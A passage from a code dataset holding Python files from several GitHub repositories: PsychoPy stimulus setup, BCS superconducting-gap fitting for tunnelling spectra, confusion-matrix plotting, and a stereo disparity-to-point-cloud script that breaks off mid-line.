units=\"pix\",\n width=self.objectSize + self.window.screen[\"containerGap\"],\n # a height spacious enough for the trails with two objects and nice visual gaps\n height=self.objectSize * 2 + 2 * self.window.screen[\"containerGap\"],\n lineColor=[-1, -1, -1], # black\n lineWidth=5)\n\n # Creating the image for the treasure (the whole of the screen size)\n self.treasureImage = visual.ImageStim(\n win=self.window,\n image=self.pathToImages + \"treasure.jpg\",\n units=\"pix\",\n size=self.window.size)\n\n # This is the function that users use. It will create the objects and their combinations\n def createStimuli(self):\n self.createObjects()\n self.createRooms()\n self.createCombinations()\n\n # Creating all objects and storing them in appropriate dictionaries\n # The use of their names as keys makes them easy to retrieve\n def createObjects(self):\n for name in self.objectNames:\n image = visual.ImageStim(\n win=self.window,\n image=self.pathToImages + name + \".png\",\n units=\"pix\",\n size=self.objectSize)\n\n self.objectImages[name] = image\n self.allImages[name] = image\n\n # Creating all rooms and storing them in appropriate dictionaries\n # The use of their names as keys makes them easy to retrieve\n def createRooms(self):\n for name in self.roomNames:\n image = visual.ImageStim(\n win=self.window,\n image=self.pathToImages + name + \".jpg\",\n units=\"pix\",\n size=self.roomSize)\n\n self.roomImages[name] = image\n self.allImages[name] = image\n\n # Randomly creates the combinations for each object and its associated rooms\n def createCombinations(self):\n roomNamesSelect = self.roomNames.copy() # copy to avoid messing up\n roomNamesSelect = roomNamesSelect * 2 # need twice the rooms because each room has two objects\n\n objectsNamesSelect = self.objectNames.copy() # copy to avoid messing up\n shuffle(objectsNamesSelect)\n\n # For each room create a key for which there is an empty list\n for room in self.roomNames:\n self.combiObjectsOfTheRooms[room] = []\n\n # For each object...\n for object in objectsNamesSelect:\n # ...randomly select a first room (and take that room out of the list) and...\n room1 = popChoice(roomNamesSelect)\n # ...randomly select a second room that cannot be the same as the first room.\n room2 = choice(roomNamesSelect)\n while room2 == room1:\n room2 = choice(roomNamesSelect)\n # take out the second room from the list\n roomNamesSelect.pop(roomNamesSelect.index(room2))\n\n # create the key of that object and put its two rooms in its list\n self.combiRoomsOfTheObjects[object] = [room1, room2]\n # append the object to each appropriate key of the object\n self.combiObjectsOfTheRooms[room1].append(object)\n self.combiObjectsOfTheRooms[room2].append(object)\n\n # This function can be used to draw a container on both sides of the screen\n def drawContainers(self):\n self.selectionContainer.pos = self.window.screen[\"left\"]\n self.selectionContainer.draw()\n\n self.selectionContainer.pos = self.window.screen[\"right\"]\n self.selectionContainer.draw()\n\n########################################################################################################################\n","repo_name":"Karakaii/python-exercise-replicating-RL-task","sub_path":"stimuli.py","file_name":"stimuli.py","file_ext":"py","file_size_in_byte":6100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"31161243063","text":"from copy import deepcopy\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom NanonisMeasurement import NanonisMeasurement\r\nfrom Physics import BCS, apply_lock_in_broadening\r\n\r\n\r\nclass NIS:\r\n \"\"\"Class containing standard data treatment applied on NIS tunneling spectra\"\"\"\r\n\r\n unit_factors = {'T':1e12,'G':1e9,'M':1e6,'k':1e3,'m':1e-3,'u':1e-6,'n':1e-9,'p':1e-12,'a':1e-12,'V':1}\r\n\r\n @staticmethod\r\n def get_coherence_peaks(spectrum_dIdV):\r\n \"\"\" find coherence peaks using cubic interpolation assuming that they are on opposite sides of x=0\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n Returns:\r\n coherence_peaks: [ [pt1x,pt1y],[pt2x,pt2y]]\r\n \"\"\"\r\n left_peak = spectrum_dIdV.get_maximum(x_range=(None,0),interpolation=\"spline\",interpolation_args={'k':3})\r\n right_peak = spectrum_dIdV.get_maximum(x_range=(0,None),interpolation=\"spline\",interpolation_args={'k':3})\r\n return [left_peak,right_peak]\r\n\r\n @staticmethod\r\n def get_gap_estimate(spectrum_dIdV):\r\n \"\"\" calculate a rough estimate of the superconducting gap based on the position of the coherence peaks \r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n Returns:\r\n Delta (float): estimate of the superconducting gap. systematically larger than the true value\r\n \"\"\"\r\n cpks = NIS.get_coherence_peaks(spectrum_dIdV)\r\n return(cpks[1][0]-cpks[0][0])/2\r\n\r\n @staticmethod\r\n def get_normal_state_conductance(spectrum_dIdV,n_pts=10):\r\n \"\"\" calculate approximative normal state conductance by averaging the first and last data points\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n n_pts (int): number of data points at both ends to use for averaging\r\n Returns:\r\n normal state conductance (float)\r\n \"\"\"\r\n x,y =spectrum_dIdV.get_x_y()\r\n delta = NIS.get_gap_estimate(spectrum_dIdV)\r\n\r\n mean_y1 = np.mean(y[:n_pts])\r\n mean_x1 = np.mean(x[:n_pts])\r\n correction_factor1 = BCS.DOS(mean_x1,delta)\r\n\r\n mean_y2 = np.mean(y[-n_pts:])\r\n mean_x2 = np.mean(x[-n_pts:])\r\n correction_factor2 = BCS.DOS(mean_x2,delta)\r\n\r\n return np.mean([mean_y1/correction_factor1,\r\n mean_y2/correction_factor2])\r\n\r\n @staticmethod\r\n def get_peak_increase(spectrum_dIdV,n_pts=10):\r\n \"\"\" calculate the approximate ratio of coherence peak height / normal state conductance\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n n_pts (int): number of data points at both ends to use for averaging\r\n Returns:\r\n coherence peak height / normal state conductance (float)\r\n \"\"\"\r\n pks = NIS.get_coherence_peaks(spectrum_dIdV)\r\n s0 = NIS.get_normal_state_conductance(spectrum_dIdV,n_pts)\r\n return np.mean([pks[0][1]/s0,pks[1][1]/s0])\r\n\r\n @staticmethod\r\n def correct_bias_offset(spectrum_dIdV):\r\n \"\"\" shift the bias such that the two coherence peaks are symmetric around 0\r\n assumes that the shift is smaller than Delta\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n \"\"\"\r\n left_peak,right_peak = NIS.get_coherence_peaks(spectrum_dIdV)\r\n shift = (right_peak[0]+left_peak[0])/2\r\n spectrum_dIdV.apply_transformation(lambda x,y:(x-shift,y))\r\n return spectrum_dIdV\r\n\r\n @staticmethod\r\n def real_dIdV(x,Delta,T,sig0=1,V_ac_pk=None,V_ac_rms=None,Gamma=0,int_point_factor=10):\r\n \"\"\" dIdV as measured in a real experiment, taking into account temperature effects and smoothing due to the AC Voltage applied by the lock-in\r\n Arguments:\r\n Delta (float): gap in eV\r\n T (float): temperature in K\r\n sig0(float): normal state conductance. default: 1\r\n V_ac_pk (float,optional): peak amplitude of the applied AC voltage in V. Either V_ac_pk or V_ac_rms has to be provided\r\n V_ac_rms (float,optional): root mean squared amplitude of the applied AC voltage in V.\r\n Gamma(float): Dynes parameter in eV\r\n int_point_factor (integer): perform the integration on int_point_factor more points than E\r\n \"\"\"\r\n Vac = V_ac_pk if V_ac_pk is not None else V_ac_rms*np.sqrt(2)\r\n \r\n E_range = (x[0]-Vac,x[-1]+Vac)\r\n theory = BCS.dIdV_NIS_eV(E_range,E_res=x[1]-x[0],\r\n Delta=Delta,T_N=T,int_point_factor=int_point_factor,Gamma=Gamma)\r\n if V_ac_pk is not None or V_ac_rms is not None:\r\n theory = apply_lock_in_broadening(theory,V_ac_pk = V_ac_pk, V_ac_rms=V_ac_rms,integration_factor=int_point_factor)\r\n return sig0*theory.evaluate(x,interpolation='linear')\r\n\r\n @staticmethod\r\n def fit_Delta_sigma(spectrum_dIdV,T,sig_guess=None,Delta_guess=None,V_ac_pk=None,V_ac_rms=None,Gamma=0,int_point_factor=10,**kwargs):\r\n \"\"\" Fit the dIdV signal with the curve expected for a BCS superconductor. Free parameters: Delta and sigma0\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n T (float): temperature in K\r\n sig_guess (float,optional) initial guess for the normal state conductance. if None: estimated from the data\r\n Delta_guess (float,optional): initial guess for the superconducting gap. if None: calculated from the coherence peak positions\r\n V_ac_pk (float,optional): peak amplitude of the applied AC voltage in V. Either V_ac_pk or V_ac_rms has to be provided\r\n V_ac_rms (float,optional): root mean squared amplitude of the applied AC voltage in V.\r\n Gamma(float): Dynes parameter in eV\r\n int_point_factor (integer): perform the DOS convolution on int_point_factor more points than in the spectrum\r\n kwargs (dictionary): additional arguments passed to scipy.curvefit\r\n Returns:\r\n (popt,pcov,perr,kwargs) where popt = [sig0,Delta], args is a dictionary holding the fit data, to be passed to NIS.real_dIdV(x,**kwargs)\r\n \"\"\"\r\n spectrum = spectrum_dIdV\r\n if spectrum_dIdV._x_unit[0] != 'V': # not V but maybe mV - convert it to V\r\n fac = NIS.unit_factors[spectrum_dIdV._x_unit[0]]\r\n spectrum = deepcopy(spectrum_dIdV)\r\n spectrum.apply_transformation(lambda x,y: (x*fac,y))\r\n\r\n p0 = [ NIS.get_normal_state_conductance(spectrum) if sig_guess is None else sig_guess,\r\n NIS.get_gap_estimate(spectrum) if Delta_guess is None else Delta_guess]\r\n if not \"p0\" in kwargs:\r\n kwargs[\"p0\"] = p0\r\n\r\n if not \"epsfcn\" in kwargs:\r\n kwargs['epsfcn'] = 10e-3\r\n\r\n popt,pcov = spectrum.fit(\r\n lambda x,sig0,Delta:NIS.real_dIdV(x = x,sig0 = sig0,Delta = Delta,T=T,Gamma=Gamma,\r\n V_ac_rms=V_ac_rms,V_ac_pk=V_ac_pk,int_point_factor=int_point_factor),\r\n **kwargs)\r\n\r\n return NISFitResult(\r\n spectrum_dIdV = spectrum_dIdV,\r\n Delta = popt[1],\r\n T = T,\r\n sig0 = popt[0],\r\n Gamma = Gamma,\r\n fit_parameter = ['sig0','Delta'],\r\n popt = popt,\r\n pcov = pcov,\r\n V_ac_pk = V_ac_pk,\r\n V_ac_rms = V_ac_rms\r\n )\r\n\r\n @staticmethod\r\n def fit_Delta(spectrum_dIdV,T,sig0 =None,Delta_guess=None,V_ac_pk=None,V_ac_rms=None,Gamma=0,int_point_factor=10,**kwargs):\r\n \"\"\" Fit the dIdV signal with the curve expected for a BCS superconductor. Free parameters: Delta\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n T (float): temperature in K\r\n sig0 (float,optional) normal state conductance. if None: estimated from the data\r\n Delta_guess (float,optional): initial guess for the superconducting gap. if None: calculated from the coherence peak positions\r\n V_ac_pk (float,optional): peak amplitude of the applied AC voltage in V. Either V_ac_pk or V_ac_rms has to be provided\r\n V_ac_rms (float,optional): root mean squared amplitude of the applied AC voltage in V.\r\n Gamma(float): Dynes parameter in eV\r\n int_point_factor (integer): perform the DOS convolution on int_point_factor more points than in the spectrum\r\n kwargs (dictionary): additional arguments passed to scipy.curvefit\r\n Returns:\r\n (popt,pcov,perr,kwargs) where popt = [Delta], args is a dictionary holding the fit data, to be passed to NIS.real_dIdV(x,**kwargs)\r\n \"\"\"\r\n spectrum = spectrum_dIdV\r\n if spectrum_dIdV._x_unit[0] != 'V': # not V but maybe mV - convert it to V\r\n fac = NIS.unit_factors[spectrum_dIdV._x_unit[0]]\r\n spectrum = deepcopy(spectrum_dIdV)\r\n spectrum.apply_transformation(lambda x,y: (x*fac,y))\r\n\r\n sig0 = sig0 if sig0 is not None else NIS.get_normal_state_conductance(spectrum)\r\n\r\n p0 = [ NIS.get_gap_estimate(spectrum) if Delta_guess is None else Delta_guess]\r\n\r\n if not \"p0\" in kwargs:\r\n kwargs[\"p0\"] = p0\r\n\r\n if not \"epsfcn\" in kwargs:\r\n kwargs['epsfcn'] = 10e-3\r\n\r\n popt,pcov = spectrum.fit(\r\n lambda x,Delta:NIS.real_dIdV(x = x,sig0 = sig0,Delta = Delta,T=T,Gamma=Gamma,\r\n V_ac_rms=V_ac_rms,V_ac_pk=V_ac_pk,int_point_factor=int_point_factor),\r\n **kwargs)\r\n \r\n return NISFitResult(\r\n spectrum_dIdV = spectrum_dIdV,\r\n Delta = popt[0],\r\n T = T,\r\n sig0 = sig0,\r\n Gamma = Gamma,\r\n fit_parameter = ['Delta'],\r\n popt = popt,\r\n pcov = pcov,\r\n V_ac_pk = V_ac_pk,\r\n V_ac_rms = V_ac_rms\r\n )\r\n\r\n @staticmethod\r\n def fit_T(spectrum_dIdV,Delta=None,sig0 =None,T_guess=0.1,V_ac_pk=None,V_ac_rms=None,Gamma=0,int_point_factor=10,**kwargs):\r\n \"\"\" Fit the dIdV signal with the curve expected for a BCS superconductor. Free parameter: T\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n Delta (float,optional): value of the superconducting gap. if None: calculated from the coherence peak positions\r\n sig0 (float,optional) normal state conductance. if None: estimated from the data\r\n T_guess (float,optional): initial guess for the temeperature in K. default: 0.1K\r\n V_ac_pk (float,optional): peak amplitude of the applied AC voltage in V. Either V_ac_pk or V_ac_rms has to be provided\r\n V_ac_rms (float,optional): root mean squared amplitude of the applied AC voltage in V.\r\n Gamma(float): Dynes parameter in eV\r\n int_point_factor (integer): perform the DOS convolution on int_point_factor more points than in the spectrum\r\n kwargs (dictionary): additional arguments passed to scipy.curvefit\r\n Returns:\r\n (popt,pcov,perr,kwargs) where popt = [T], args is a dictionary holding the fit data, to be passed to NIS.real_dIdV(x,**kwargs)\r\n \"\"\"\r\n spectrum = spectrum_dIdV\r\n if spectrum_dIdV._x_unit[0] != 'V': # not V but maybe mV - convert it to V\r\n fac = NIS.unit_factors[spectrum_dIdV._x_unit[0]]\r\n spectrum = deepcopy(spectrum_dIdV)\r\n spectrum.apply_transformation(lambda x,y: (x*fac,y))\r\n\r\n sig0 = sig0 if sig0 is not None else NIS.get_normal_state_conductance(spectrum)\r\n Delta = NIS.get_gap_estimate(spectrum) if Delta is None else Delta\r\n\r\n p0 = [ T_guess ]\r\n\r\n if not \"p0\" in kwargs:\r\n kwargs[\"p0\"] = p0\r\n\r\n if not \"epsfcn\" in kwargs:\r\n kwargs['epsfcn'] = 10e-3\r\n\r\n popt,pcov = spectrum.fit(\r\n lambda x,T:NIS.real_dIdV(x = x,sig0 = sig0,Delta = Delta,T=T,Gamma=Gamma,\r\n V_ac_rms=V_ac_rms,V_ac_pk=V_ac_pk,int_point_factor=int_point_factor),\r\n **kwargs)\r\n \r\n return NISFitResult(\r\n spectrum_dIdV = spectrum_dIdV,\r\n Delta = Delta,\r\n T = popt[0],\r\n sig0 = sig0,\r\n Gamma = Gamma,\r\n fit_parameter = ['T'],\r\n popt = popt,\r\n pcov = pcov,\r\n V_ac_pk = V_ac_pk,\r\n V_ac_rms = V_ac_rms\r\n )\r\n \r\n @staticmethod\r\n def fit(spectrum_dIdV,Delta_guess=None,sig0_guess =None,T_guess=0.1,V_ac_pk=None,V_ac_rms=None,Gamma_guess=0,int_point_factor=10,x_range=(None,None),**kwargs):\r\n \"\"\" Fit the dIdV signal with the curve expected for a BCS superconductor. Free parameters: Delta, sig0, T, Gamma\r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): the dIdV data of the NIS spectrum\r\n Delta_guess (float,optional): intitial guess for the value of the superconducting gap. if None: calculated from the coherence peak positions\r\n sig0_guess (float,optional) initial guess for the normal state conductance. if None: estimated from the data\r\n T_guess (float,optional): initial guess for the temeperature in K. default: 0.1K\r\n V_ac_pk (float,optional): peak amplitude of the applied AC voltage in V. Either V_ac_pk or V_ac_rms has to be provided\r\n V_ac_rms (float,optional): root mean squared amplitude of the applied AC voltage in V.\r\n Gamma_guess(float): initial guess for the Dynes parameter in eV\r\n int_point_factor (integer): perform the DOS convolution on int_point_factor more points than in the spectrum\r\n x_range(float,float): the x-range (in units of x data) of the curve that should be used for fitting.\r\n kwargs (dictionary): additional arguments passed to scipy.curvefit\r\n Returns:\r\n (popt,pcov,perr,kwargs) where popt = [sig0,Delta,T,Gamma], args is a dictionary holding the fit data, to be passed to NIS.real_dIdV(x,**kwargs)\r\n \"\"\"\r\n spectrum = deepcopy(spectrum_dIdV).crop(x_range)\r\n if spectrum_dIdV._x_unit[0] != 'V': # not V but maybe mV - convert it to V\r\n fac = NIS.unit_factors[spectrum_dIdV._x_unit[0]]\r\n spectrum.apply_transformation(lambda x,y: (x*fac,y))\r\n\r\n sig0_guess = sig0_guess if sig0_guess is not None else NIS.get_normal_state_conductance(spectrum)\r\n Delta_guess = NIS.get_gap_estimate(spectrum) if Delta_guess is None else Delta_guess\r\n\r\n p0 = [ sig0_guess, Delta_guess, T_guess, Gamma_guess ]\r\n\r\n if not \"p0\" in kwargs:\r\n kwargs[\"p0\"] = p0\r\n\r\n if not \"epsfcn\" in kwargs:\r\n kwargs['epsfcn'] = 10e-3\r\n\r\n popt,pcov = spectrum_dIdV.fit(\r\n lambda x,sig0,Delta,T,Gamma:NIS.real_dIdV(x = x,sig0 = sig0,Delta = Delta,T=T,Gamma=Gamma,\r\n V_ac_rms=V_ac_rms,V_ac_pk=V_ac_pk,int_point_factor=int_point_factor),\r\n **kwargs)\r\n\r\n return NISFitResult(\r\n spectrum_dIdV = spectrum_dIdV,\r\n Delta = popt[1],\r\n T = popt[2],\r\n sig0 = popt[0],\r\n Gamma = popt[3],\r\n fit_parameter = ['sig0','Delta','T','Gamma'],\r\n popt = popt,\r\n pcov = pcov,\r\n V_ac_pk = V_ac_pk,\r\n V_ac_rms = V_ac_rms,\r\n x_range = x_range\r\n )\r\n \r\n\r\nclass NISFitResult:\r\n \"\"\"Class storing the results of an NIS fit\"\"\"\r\n\r\n def __init__(self,spectrum_dIdV,Delta,T,sig0,Gamma,fit_parameter,popt,pcov,V_ac_pk=None,V_ac_rms=None,x_range=(None,None)):\r\n \"\"\"Create a ISFitResult object\r\n \r\n Arguments:\r\n spectrum_dIdV (simscidapy.Curve): spectrum which was fitted\r\n Delta (float): value of the superconducting gap\r\n T (float): temperature in K\r\n sig0 (float) normal state conductance\r\n Gamma(float): Dynes parameter in eV\r\n fit_parameter(list of string): names of the parameters that were fitted in the order corresponding to the values in popt\r\n popt (np.array): optimum values as calculated by scipy.curvefit\r\n pcov (np.array): covariance matrix as calculated by scipy.curvefit\r\n V_ac_pk (float,optional): peak amplitude of the applied AC voltage in V. Either V_ac_pk or V_ac_rms has to be provided\r\n V_ac_rms (float,optional): root mean squared amplitude of the applied AC voltage in V.\r\n x_range (float,float) the x-range (in units of x data) of the curve that should be used for fitting.\r\n \"\"\"\r\n self.spectrum = spectrum_dIdV\r\n self.Delta = Delta\r\n self.T = T\r\n self.sig0 = sig0\r\n self.Gamma = Gamma\r\n self.fit_parameter = fit_parameter\r\n self.popt = popt\r\n self.pcov = pcov\r\n self.x_range = x_range\r\n\r\n if V_ac_pk is None and V_ac_rms is None:\r\n raise ValueError('Either V_ac_pk or V_ac_rms has to be provided but none was given!')\r\n self.V_ac_pk = V_ac_pk if V_ac_pk is not None else V_ac_rms*np.sqrt(2)\r\n\r\n self.Delta_err = self.perr[fit_parameter.index('Delta')] if 'Delta' in fit_parameter else 0\r\n self.T_err = self.perr[fit_parameter.index('T')] if 'T' in fit_parameter else 0\r\n self.sig0_err = self.perr[fit_parameter.index('sig0')] if 'sig0' in fit_parameter else 0\r\n self.Gamma_err = self.perr[fit_parameter.index('Gamma')] if 'Gamma' in fit_parameter else 0\r\n\r\n \r\n @property\r\n def V_ac_rms(self):\r\n return self.V_ac_pk / np.sqrt(2)\r\n \r\n @V_ac_rms.setter\r\n def V_ac_rms(self, value):\r\n self.V_ac_pk = value*np.sqrt(2)\r\n \r\n @property\r\n def perr(self):\r\n return np.sqrt(np.diag(self.pcov))\r\n\r\n def plot(self,fig=None,ax=None,x=None,x_unit=None,fit_plot_args={},plot_spectrum=True,spectrum_plot_args={},legend='best'):\r\n \"\"\"Plot the fit.\r\n \r\n Arguments (all arguments are optional):\r\n fig (matplotlib.figure): figure to plot into. if fig and ax are None: create a new one\r\n ax (matplotlib.axes): axes to plot into. if None: create a new one\r\n x (np.array(float)): x values for which to plot the fit in V. if None: use the values of the fit\r\n x_unit (string): unit of the x axis. default: same as the data spectrum \r\n fit_plot_args (dictionary): style arguments for plotting the fit, passed on to axes.plot. If none provided: dashed line\r\n plot_spectrum (bool): whether or not to plot the measured data that was fitted in the background, default: True\r\n spectrum_plot_args (dictionary): style arguments for plotting the measured data, passed to axes.plot\r\n legend (string or None): location of the legend (see matplotlib.axes.plot - loc argument) or None for no legend, default: \"best\"\r\n Returns:\r\n fig,ax of the plot\r\n \"\"\"\r\n if x_unit is None:\r\n x_unit = self.spectrum._x_unit\r\n\r\n if ax is None:\r\n fig, ax = plt.subplots()\r\n if plot_spectrum:\r\n self.spectrum.setup_plot(ax)\r\n ax.set_xlabel(f'Bias ({x_unit})')\r\n ax.set_ylabel('dI/dV (a.u.)')\r\n \r\n if plot_spectrum:\r\n if x_unit != self.spectrum._x_unit:\r\n spec = deepcopy(self.spectrum)\r\n fac = NIS.unit_factors[self.spectrum._x_unit[0]]/NIS.unit_factors[x_unit[0]]\r\n spec = spec.apply_transformation(lambda x,y: (x*fac,y))\r\n else:\r\n spec = self.spectrum\r\n spec.plot(ax,plot_args = spectrum_plot_args)\r\n \r\n if x is None:\r\n x = self.spectrum.get_x(self.x_range)*NIS.unit_factors[self.spectrum._x_unit[0]] # x in V\r\n \r\n y = NIS.real_dIdV(x,Delta = self.Delta, T = self.T, sig0=self.sig0, V_ac_pk=self.V_ac_pk, Gamma = self.Gamma)\r\n\r\n if fit_plot_args == {}:\r\n fit_plot_args = dict(ls='--')\r\n ax.plot(x/NIS.unit_factors[x_unit[0]],y,\r\n label=f\"BCS fit: \\nT = {self.T*1e3:.0f}mK\\nΔ = {self.Delta*1e6:.0f}µeV\\nVac = {self.V_ac_rms:.0f}µVrms\\nΓ = {self.Gamma*1e6:.0f}µeV\",\r\n **fit_plot_args)\r\n if legend is not None:\r\n ax.legend(loc=legend)\r\n return fig,ax\r\n ","repo_name":"djwander/stmtools","sub_path":"stmtools/SuperconductingSample.py","file_name":"SuperconductingSample.py","file_ext":"py","file_size_in_byte":21735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"15054892279","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 29 12:00:26 2022\n\n@author: sergio\n\"\"\"\n\nimport numpy as np \n\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt \n\n\n\ndef plot_confusion_matrix(y_true, y_pred, classes,\n save_name,\n normalize=False,\n title=None,\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if not title:\n if normalize:\n title = 'Normalized confusion matrix'\n else:\n title = 'Confusion matrix, without normalization'\n\n # Compute confusion matrix\n cm = confusion_matrix(y_true, y_pred)\n # Only use the labels that appear in the data\n classes = classes\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n fig, ax = plt.subplots()\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n # ax.figure.colorbar(im, ax=ax)\n # We want to show all ticks...\n ax.set(xticks=np.arange(cm.shape[1]),\n yticks=np.arange(cm.shape[0]),\n ylim=[1.5, -0.5],\n # ... and label them with the respective list entries\n xticklabels=classes, yticklabels=classes,\n title=title,\n ylabel='True label',\n xlabel='Predicted label')\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n rotation_mode=\"anchor\")\n\n # Loop over data dimensions and create text annotations.\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i in range(cm.shape[0]):\n for j in range(cm.shape[1]):\n ax.text(j, i, cm[i, j],\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n fig.tight_layout()\n fig.savefig(save_name)\n \n \ndef visualize_results(history,name):\n \n # Plot the accuracy and loss curves\n acc = history.history['accuracy']\n val_acc = history.history['val_accuracy']\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n epochs = range(len(acc))\n \n \n plt.plot(epochs, acc, 'b', label='Training acc') \n plt.plot(epochs, val_acc, 'r', label='Validation acc')\n plt.title('Training and validation accuracy')\n \n plt.legend()\n plt.figure()\n \n plt.plot(epochs, loss, 'b', label='Training loss')\n plt.plot(epochs, val_loss, 'r', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend()\n plt.savefig(name)","repo_name":"sergioortiz26/Cancer_overlapping_filter_WSI_images","sub_path":"plot_confusion_matrix.py","file_name":"plot_confusion_matrix.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"10602103101","text":"import cv2\nimport pcds\nimport time\nimport math\nimport stereoPairs\nimport numpy as np\nimport open3d as o3d\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom kd_tree import kd_tree\nfrom KittiReconstruction import loadCalib\nfrom scipy.ndimage import convolve\nfrom sklearn.cluster import DBSCAN\nfrom matplotlib.patches import Rectangle\n\n\n# Function that displays an image with a rectangle on top of it\ndef disp_image_and_rectangle(img, rect_start, template_rows, template_cols):\n \"\"\"\n Display the image and the rectangle on top of it\n :param img: The image to display\n :param rect_start: The top left corner of the rectangle\n :param template_rows: The number of rows of the rectangle\n :param template_cols: The number of columns of the rectangle\n :return: Display the image and the rectangle on top of it\n \"\"\"\n # Display the original image\n plt.imshow(img, cmap='gray')\n\n # Get the current reference\n ax = plt.gca()\n\n # Create a Rectangle patch\n rect = Rectangle(rect_start, template_cols, template_rows, linewidth=1, edgecolor='r', facecolor='none')\n\n # Add the patch to the Axes\n ax.add_patch(rect)\n\n plt.show()\n\n\n# Function that visualizes the stereo frames\ndef visualize_stereo_frames(left_frame: np.ndarray, right_frame: np.ndarray):\n \"\"\"\n Visualize the stereo frames\n :param left_frame: The left frame\n :param right_frame: The right frame\n :return: Visualize the stereo frames\n \"\"\"\n\n # Concatenate the left and right frames horizontally\n concatenated_frames = np.hstack((left_frame, right_frame))\n\n # Convert to RGB if the input is in BGR format\n if left_frame.ndim == 3 and left_frame.shape[2] == 3:\n concatenated_frames = cv2.cvtColor(concatenated_frames, cv2.COLOR_BGR2RGB)\n\n # Display the concatenated frames using Matplotlib\n plt.figure(figsize=(12, 5))\n plt.imshow(concatenated_frames, cmap='gray' if left_frame.ndim == 2 else None)\n plt.title('Stereo Frames')\n plt.axis('off')\n plt.show()\n\n\n# Function that visualizes a disparity map\ndef visualize_disparity_map(disparity_map: np.ndarray, cmap: str = 'jet', title: str = 'Disparity Map'):\n \"\"\"\n Visualize the disparity map\n :param title:\n :param disparity_map: The disparity map\n :param cmap: The color map to use\n :return: Visualize the disparity map\n \"\"\"\n # Normalize the disparity map for visualization\n # normalized_disparity = (disparity_map - disparity_map.min()) / (disparity_map.max() - disparity_map.min())\n normalized_disparity = disparity_map\n\n # Display the disparity map using Matplotlib\n plt.figure(figsize=(12, 5))\n plt.imshow(normalized_disparity, cmap=cmap)\n plt.title(title)\n plt.axis('off')\n plt.colorbar()\n plt.show()\n\n\n# Function that visualizes the point cloud\ndef visualize_point_cloud(vertices: np.ndarray, colors: np.ndarray):\n \"\"\"\n Visualize the point cloud\n :param vertices: The vertices of the point cloud\n :param colors: The colors of the point cloud\n :return: Visualize the point cloud\n \"\"\"\n # Create a point cloud object\n point_cloud = o3d.geometry.PointCloud()\n\n # Set the vertices and the colors\n point_cloud.points = o3d.utility.Vector3dVector(vertices)\n point_cloud.colors = o3d.utility.Vector3dVector(colors)\n\n # Visualize the point cloud\n o3d.visualization.draw_geometries([point_cloud])\n\n\n# Function that calculates a disparity map from a stereo pair using block matching algorithm\ndef stereo2disparity(left_frame: np.ndarray, right_frame: np.ndarray, block_size: int, previous_blocks_num: int):\n \"\"\"\n Stereo to disparity\n :param left_frame: The left frame\n :param right_frame: The right frame\n :param block_size: The block size\n :param previous_blocks_num: The number of previous blocks\n :return: The disparity map\n \"\"\"\n # Get the shape of the left frame\n rows, cols = left_frame.shape\n\n # Initialize the disparity map\n disparity_map = np.zeros_like(left_frame, dtype=np.float32)\n\n # Iterate over the left frame\n for row in tqdm(range(rows)):\n for col in range(cols):\n # Get the template\n template = left_frame[row: row + block_size, col: col + block_size]\n\n # Set the start of the columns of the search space as a parameter\n column_start = max(0, col - previous_blocks_num * block_size)\n # Set the end of the columns of the search space as a parameter\n column_end = col + block_size\n\n # Get the search space\n search_space = right_frame[row: row + block_size, column_start: column_end]\n\n # Do the template matching\n res = cv2.matchTemplate(search_space, template, cv2.TM_SQDIFF)\n\n # find the location of the min value\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n\n # Get the disparity\n disparity = col - (column_start + min_loc[0])\n\n # Update the disparity map\n disparity_map[row, col] = disparity\n\n return disparity_map\n\n\n# Function that calculate a point cloud from a disparity map using the pinhole camera model\ndef disparity2pointcloud(rows: int,\n columns: int,\n disparity: np.ndarray,\n baseline: float,\n left_frame_color: np.ndarray,\n field_of_view: float = 1.2,\n scale: int = 40):\n \"\"\"\n Disparity to point cloud\n :return: The vertices and the colors of the point cloud\n \"\"\"\n # Get the center of the image\n u0 = columns / 2\n v0 = rows / 2\n\n # Calculate the focal length\n focal_length = 1.0 / (2.0 * np.tan(field_of_view / 2.0))\n\n # Initialize the vertices and the color lists for the point cloud\n vertices = []\n colors = []\n\n # Iterate over the disparity map and calculate the point cloud\n for i in range(columns):\n for j in range(rows):\n # Normalize the disparity in order to be in the range [0, 1]\n normalized_disparity = disparity[j, i] / columns\n\n # If the normalized disparity is 0, then skip this point\n if normalized_disparity == 